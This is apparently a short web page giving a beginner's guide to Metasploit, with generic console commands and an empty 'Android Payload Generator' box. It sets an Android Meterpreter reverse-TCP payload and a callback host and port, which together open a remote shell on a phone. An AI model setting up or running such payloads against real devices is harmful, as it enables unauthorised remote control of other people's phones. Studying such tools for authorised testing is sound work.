Metasploit Guide

Learn how to use Metasploit with these common commands.

Starting Metasploit

msfconsole

Searching for Exploits

search exploit_name

Using an Exploit

use exploit/path

Setting Payload

set payload android/meterpreter/reverse_tcp

Configuring Options

set LHOST [your IP] set LPORT [your Port]

Running the Exploit

exploit

Android Payload Generator




Your payload command will appear here.